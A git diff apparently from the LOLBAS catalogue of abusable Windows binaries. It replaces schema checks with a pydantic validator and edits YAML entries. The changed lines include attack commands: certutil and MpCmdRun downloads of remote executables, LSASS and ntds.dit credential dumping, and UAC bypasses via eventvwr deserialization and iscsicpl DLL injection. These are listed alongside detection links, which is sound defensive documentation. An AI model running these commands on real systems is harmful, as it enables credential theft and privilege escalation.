diff --git a/.github/.yamllint b/.github/.yamllint index d61d0a0f..ca69133a 100644 --- a/.github/.yamllint +++ b/.github/.yamllint @@ -8,6 +8,7 @@ rules: trailing-spaces: level: error line-length: + max: 1000 level: warning new-lines: level: error diff --git a/.github/workflows/validation.py b/.github/workflows/validation.py new file mode 100644 index 00000000..64c77fec --- /dev/null +++ b/.github/workflows/validation.py @@ -0,0 +1,120 @@ +import glob +import os +import sys +from typing import List, Literal, Optional + +import yaml +from pydantic import BaseModel, HttpUrl, RootModel, ValidationError, constr, model_validator, field_validator, ConfigDict + +# Disable datetime parsing +yaml.SafeLoader.yaml_implicit_resolvers = {k: [r for r in v if r[0] != 'tag:yaml.org,2002:timestamp'] for k, v in yaml.SafeLoader.yaml_implicit_resolvers.items()} + + +safe_str = constr(pattern=r'^([a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&%~=]|`[a-zA-Z0-9\s.,!?\'"():;\-\+_*#@/\\&<>%\{\}~=]+`|->)+$') + + +class LolbasModel(BaseModel): + model_config = ConfigDict(extra="forbid") + + +class AliasItem(LolbasModel): + Alias: Optional[str] + + +class TagItem(RootModel[dict[constr(pattern=r'^[A-Z]'), str]]): + pass + + +class CommandItem(LolbasModel): + Command: str + Description: safe_str + Usecase: safe_str + Category: Literal['ADS', 'AWL Bypass', 'Compile', 'Conceal', 'Copy', 'Credentials', 'Decode', 'Download', 'Dump', 'Encode', 'Execute', 'Reconnaissance', 'Tamper', 'UAC Bypass', 'Upload'] + Privileges: str + MitreID: constr(pattern=r'^T[0-9]{4}(\.[0-9]{3})?$') + OperatingSystem: str + Tags: Optional[List[TagItem]] = None + + +class FullPathItem(LolbasModel): + Path: constr(pattern=r'^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)<>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$') + + +class CodeSampleItem(LolbasModel): + Code: str + + +class DetectionItem(LolbasModel): + IOC: Optional[str] = None + Sigma: Optional[HttpUrl] = None + Analysis: Optional[HttpUrl] = None + Elastic: Optional[HttpUrl] = None + Splunk: Optional[HttpUrl] = None + BlockRule: Optional[HttpUrl] = None + + @model_validator(mode="after") + def validate_exclusive_urls(cls, values): + url_fields = ['IOC', 'Sigma', 'Analysis', 'Elastic', 'Splunk', 'BlockRule'] + present = [field for field in url_fields if values.__dict__.get(field) is not None] + + if len(present) != 1: + raise ValueError(f"Exactly one of the following must be provided: {url_fields}.", f"Currently set: {present or 'none'}") + + return values + + +class ResourceItem(LolbasModel): + Link: HttpUrl + + +class AcknowledgementItem(LolbasModel): + Person: str + Handle: Optional[constr(pattern=r'^(@(\w){1,15})?$')] = None + + +class MainModel(LolbasModel): + Name: str + Description: safe_str + Aliases: Optional[List[AliasItem]] = None + Author: str + Created: constr(pattern=r'\d{4}-\d{2}-\d{2}') + Commands: List[CommandItem] + Full_Path: List[FullPathItem] + Code_Sample: Optional[List[CodeSampleItem]] = None + Detection: Optional[List[DetectionItem]] = None + Resources: Optional[List[ResourceItem]] = None + Acknowledgement: Optional[List[AcknowledgementItem]] = None + + +if __name__ == "__main__": + def escaper(x): return x.replace('%', '%25').replace('\r', '%0D').replace('\n', '%0A') + + yaml_files = glob.glob("yml/**", recursive=True) + + if not yaml_files: + print("No YAML files found under 'yml/**'.") + sys.exit(-1) + + has_errors = False + for file_path in yaml_files: + if os.path.isfile(file_path) and not file_path.startswith('yml/HonorableMentions/'): + try: + with open(file_path, 'r', encoding='utf-8') as f: + data = yaml.safe_load(f) + MainModel(**data) + print(f"✅ Valid: {file_path}") + except ValidationError as ve: + print(f"❌ Validation error in {file_path}:\n{ve}\n") + for err in ve.errors(): + # GitHub Actions error format + print(err) + path = '.'.join([str(x) for x in err.get('loc', [None])]) + msg = err.get('msg', 'Unknown validation error') + print(f"::error file={file_path},line=1,title={escaper(err.get('type') or 'Validation error')}::{escaper(msg)}: {escaper(path)}") + has_errors = True + except Exception as e: + print(f"⚠️ Error processing {file_path}: {e}\n") + print(f"::error file={file_path},line=1,title=Processing error::Error processing file: {escaper(e)}") + has_errors = True + + sys.exit(-1 if has_errors else 0) diff --git a/.github/workflows/yaml-linting.yml b/.github/workflows/yaml-linting.yml index bdf6d09b..2f888313 100644 --- a/.github/workflows/yaml-linting.yml +++ b/.github/workflows/yaml-linting.yml @@ -8,6 +8,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 + - name: Check file extensions run: | files=$(find "$GITHUB_WORKSPACE/yml" -type f -not -name "*.yml"); @@ -17,6 +18,7 @@ jobs: exit 1; fi unset files + - name: Check duplicate file names run: | files=$(find "$GITHUB_WORKSPACE/yml/OSBinaries" "$GITHUB_WORKSPACE/yml/OtherMSBinaries" -type f -printf '%h %f\n' -iname "*.yml" | sort -t ' ' -k 2,2 -f | uniq -i -f 1 --all-repeated=separate | tr ' ' '/') @@ -26,34 +28,12 @@ jobs: exit 1; fi unset files - - name: yaml-lint - uses: ibiqlik/action-yamllint@v3 - with: - no_warnings: true - file_or_dir: yml/**/*.yml - config_file: .github/.yamllint - - name: Validate Template Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: YML-Template.yml - schema: YML-Schema.yml - - name: Validate OSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSBinaries/*.yml - schema: YML-Schema.yml - - name: Validate OSLibraries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSLibraries/*.yml - schema: YML-Schema.yml - - name: Validate OSScripts YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OSScripts/*.yml - schema: YML-Schema.yml - - name: Validate OtherMSBinaries YAML Schema - uses: cketti/action-pykwalify@v0.3-temp-fix - with: - files: yml/OtherMSBinaries/*.yml - schema: YML-Schema.yml + + - name: Install python dependencies + run: pip install yamllint==1.37.1 pydantic==2.11.9 + + - name: Lint YAML files + run: yamllint -c .github/.yamllint yml/**/ + + - name: Validate YAML schemas + run: python3 .github/workflows/validation.py diff --git a/YML-Schema.yml b/YML-Schema.yml deleted file mode 100644 index a452050d..00000000 --- a/YML-Schema.yml +++ /dev/null @@ -1,129 +0,0 @@ ---- -type: map -mapping: -# Id field enhancement possibility commenting out for now -# "Id": -# type: str -# required: true -# pattern: '[a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}' - "Name": - type: str - required: true - "Description": - type: str - required: true - "Aliases": - type: seq - required: false - sequence: - - type: map - mapping: - "Alias": - type: str - required: false - "Author": - type: str - required: true - "Created": - type: date - format: '%Y-%M-%d' - required: true - "Commands": - type: seq - required: true - sequence: - - type: map - mapping: - "Command": - type: str - required: true - "Description": - type: str - required: true - "Usecase": - type: str - required: true - "Category": - type: str - required: true - enum: [ADS, AWL Bypass, Compile, Conceal, Copy, Credentials, Decode, Download, Dump, Encode, Execute, Reconnaissance, Tamper, UAC Bypass, Upload] - "Privileges": - type: str - required: true - "MitreID": - type: str - required: true - pattern: '^T[0-9]{4}(\.[0-9]{3})?$' - "OperatingSystem": - type: str - required: true - "Tags": - type: seq - sequence: - - type: map - mapping: - regex;(^[A-Z]): - type: str - required: false - "Full_Path": - type: seq - required: true - sequence: - - type: map - mapping: - "Path": - type: str - required: true - pattern: '^(([cC]:)\\([a-zA-Z0-9\-\_\. \(\)\<\>]+\\)*([a-zA-Z0-9_\-\.]+\.[a-z0-9]{3})|no default)$' - "Code_Sample": - type: seq - required: false - sequence: - - type: map - mapping: - "Code": - type: str - "Detection": - type: seq - required: false - sequence: - - type: map - mapping: - "IOC": - type: str - "Sigma": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Analysis": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Elastic": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Splunk": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "BlockRule": - type: str - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Resources": - type: seq - required: false - sequence: - - type: map - mapping: - "Link": - type: str - required: true - pattern: '^http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+#~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+$' - "Acknowledgement": - type: seq - required: false - sequence: - - type: map - mapping: - "Person": - type: str - "Handle": - type: str - pattern: '^(@(\w){1,15})?$' diff --git a/yml/OSBinaries/Bitsadmin.yml b/yml/OSBinaries/Bitsadmin.yml index bab54d66..f65b2137 100644 --- a/yml/OSBinaries/Bitsadmin.yml +++ b/yml/OSBinaries/Bitsadmin.yml @@ -35,8 +35,6 @@ Commands: Full_Path: - Path: C:\Windows\System32\bitsadmin.exe - Path: C:\Windows\SysWOW64\bitsadmin.exe -Code_Sample: - - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/web/proxy_generic/proxy_ua_bitsadmin_susp_tld.yml diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index 916762c7..d575e6e6 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe} - Description: Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash] when not. + Description: Download and save an executable to disk in the current folder when a file path is specified, or `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\` when not. Usecase: Download file from Internet Category: Download Privileges: User @@ -26,7 +26,7 @@ Commands: MitreID: T1564.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 - Command: certutil.exe -URL {REMOTEURL:.exe} - Description: Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\[hash]. + Description: Download and save an executable to `%LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\`. Usecase: Download file from Internet Category: Download Privileges: User diff --git a/yml/OSBinaries/Cmdkey.yml b/yml/OSBinaries/Cmdkey.yml index 018979b2..ddc4dc48 100644 --- a/yml/OSBinaries/Cmdkey.yml +++ b/yml/OSBinaries/Cmdkey.yml @@ -19,6 +19,3 @@ Detection: Resources: - Link: https://web.archive.org/web/20230202122017/https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - Link: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey -Acknowledgement: - - Person: - Handle: diff --git a/yml/OSBinaries/Eudcedit.yml b/yml/OSBinaries/Eudcedit.yml index d0ca6772..4e956b56 100644 --- a/yml/OSBinaries/Eudcedit.yml +++ b/yml/OSBinaries/Eudcedit.yml @@ -5,7 +5,7 @@ Author: Matan Bahar Created: 2025-08-07 Commands: - Command: eudcedit - Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute. + Description: Once executed, the Private Charecter Editor will be opened - click OK, then click File -> Font Links. In the next window choose the option "Link with Selected Fonts" and click on Save As, then in the opened enter the command you want to execute. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: Administrator diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 56e4bdea..1f608bd8 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -5,7 +5,7 @@ Author: Jacob Gajek Created: 2018-11-01 Commands: - Command: eventvwr.exe - Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. + Description: During startup, eventvwr.exe checks the registry value `HKCU\Software\Classes\mscfile\shell\open\command` for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass Privileges: User @@ -15,7 +15,7 @@ Commands: - Application: GUI - Execute: EXE - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c "{CMD}" > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe - Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net + Description: During startup, eventvwr.exe uses .NET deserialization with `%LOCALAPPDATA%\Microsoft\EventV~1\RecentViews` file. This file can be created using https://github.com/pwntester/ysoserial.net Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters. Category: UAC Bypass Privileges: Administrator diff --git a/yml/OSBinaries/Iscsicpl.yml b/yml/OSBinaries/Iscsicpl.yml index e02b1148..46b8f7d6 100644 --- a/yml/OSBinaries/Iscsicpl.yml +++ b/yml/OSBinaries/Iscsicpl.yml @@ -4,7 +4,7 @@ Description: Microsoft iSCSI Initiator Control Panel tool Author: Ekitji Created: 2025-08-17 Commands: - - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary + - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass. Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt. Category: UAC Bypass @@ -13,7 +13,7 @@ Commands: OperatingSystem: Windows 10, Windows 11 Tags: - Execute: DLL - - Command: iscsicpl.exe # SysWOW64/System32 binary + - Command: iscsicpl.exe # SysWOW64/System32 binary Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have UAC bypass through launching iscicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. Category: UAC Bypass @@ -24,8 +24,8 @@ Commands: - Execute: CMD - Application: GUI Full_Path: - - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application - - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application + - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application + - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml - IOC: C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll diff --git a/yml/OSBinaries/Ldifde.yml b/yml/OSBinaries/Ldifde.yml index cb31bf57..ff40cc7e 100644 --- a/yml/OSBinaries/Ldifde.yml +++ b/yml/OSBinaries/Ldifde.yml @@ -5,7 +5,7 @@ Author: Grzegorz Tworek Created: 2022-08-31 Commands: - Command: Ldifde -i -f {PATH:.ldf} - Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as thumbnailPhoto:< http://example.org/somefile.txt, the file will be downloaded into IE temp folder. + Description: Import specified .ldf file into LDAP. If the file contains http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into IE temp folder. Usecase: Download file from Internet Category: Download Privileges: Administrator diff --git a/yml/OSBinaries/MpCmdRun.yml b/yml/OSBinaries/MpCmdRun.yml index 62e0de7c..d2c20f6d 100644 --- a/yml/OSBinaries/MpCmdRun.yml +++ b/yml/OSBinaries/MpCmdRun.yml @@ -12,7 +12,7 @@ Commands: MitreID: T1105 OperatingSystem: Windows 10 - Command: copy "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" C:\Users\Public\Downloads\MP.exe && chdir "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\" && "C:\Users\Public\Downloads\MP.exe" -DownloadFile -url {REMOTEURL:.exe} -path C:\Users\Public\Downloads\evil.exe - Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path) [updated version to bypass Windows 10 mitigation] + Description: Download file to specified path. Slashes work as well as dashes (/DownloadFile, /url, /path). Updated version to bypass Windows 10 mitigation. Usecase: Download file Category: Download Privileges: User diff --git a/yml/OSBinaries/OneDriveStandaloneUpdater.yml b/yml/OSBinaries/OneDriveStandaloneUpdater.yml index d54ebc36..91dc3e76 100644 --- a/yml/OSBinaries/OneDriveStandaloneUpdater.yml +++ b/yml/OSBinaries/OneDriveStandaloneUpdater.yml @@ -5,7 +5,7 @@ Author: 'Elliot Killick' Created: 2021-08-22 Commands: - Command: OneDriveStandaloneUpdater - Description: Download a file from the web address specified in HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC. ODSUUpdateXMLUrlFromOC and UpdateXMLUrlFromOC must be equal to non-empty string values in that same registry key. UpdateOfficeConfigTimestamp is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in %localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json + Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`. Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments Category: Download Privileges: User diff --git a/yml/OSBinaries/Rdrleakdiag.yml b/yml/OSBinaries/Rdrleakdiag.yml index 65ec1920..3ba8dfe0 100644 --- a/yml/OSBinaries/Rdrleakdiag.yml +++ b/yml/OSBinaries/Rdrleakdiag.yml @@ -5,21 +5,21 @@ Author: 'John Dwyer' Created: 2022-05-18 Commands: - Command: rdrleakdiag.exe /p 940 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 - Description: Dump process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). + Description: Dump process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump process by PID. Category: Dump Privileges: User MitreID: T1003 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /wait 1 - Description: Dump LSASS process by PID and create a dump file (Creates files called minidump_.dmp and results_.hlk). + Description: Dump LSASS process by PID and create a dump file (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process. Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows - Command: rdrleakdiag.exe /p 832 /o {PATH_ABSOLUTE:folder} /fullmemdmp /snap - Description: After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_.dmp and results_.hlk). + Description: After dumping a process using `/wait 1`, subsequent dumps must use `/snap` (creates files called `minidump_.dmp` and `results_.hlk`). Usecase: Dump LSASS process mutliple times. Category: Dump Privileges: Administrator diff --git a/yml/OtherMSBinaries/Dsdbutil.yml b/yml/OtherMSBinaries/Dsdbutil.yml index 0507c875..1bf8d6b3 100644 --- a/yml/OtherMSBinaries/Dsdbutil.yml +++ b/yml/OtherMSBinaries/Dsdbutil.yml @@ -15,7 +15,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit" Description: Mounting the snapshot with its GUID - Usecase: Mounting the snapshot to access the ntds.dit with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak + Usecase: Mounting the snapshot to access the ntds.dit with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 @@ -29,7 +29,7 @@ Commands: OperatingSystem: Windows Server 2012, Windows Server 2016, Windows Server 2019 - Command: dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit" Description: Mounting with snapshot identifier - Usecase: Mounting the snapshot identifier 1 and accessing it with with copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak + Usecase: Mounting the snapshot identifier 1 and accessing it with `copy c:\\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak` Category: Dump Privileges: Administrator MitreID: T1003.003 @@ -51,11 +51,6 @@ Detection: - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit - IOC: Event ID 4656 - IOC: Regular and Volume Shadow Copy attempts to read or modify ntds.dit - - Analysis: - - Sigma: - - Elastic: - - Splunk: - - BlockRule: Resources: - Link: https://gist.github.com/bohops/88561ca40998e83deb3d1da90289e358 - Link: https://www.netwrix.com/ntds_dit_security_active_directory.html diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml index da3c0368..2898e054 100644 --- a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml @@ -5,7 +5,7 @@ Author: Jimmy (@bohops) Created: 2021-09-26 Commands: - Command: VisualUiaVerifyNative.exe - Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Description: Generate Serialized gadget and save to - `C:\Users\%USERNAME%\AppData\Roaminguiverify.config` before executing. Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies Category: AWL Bypass Privileges: User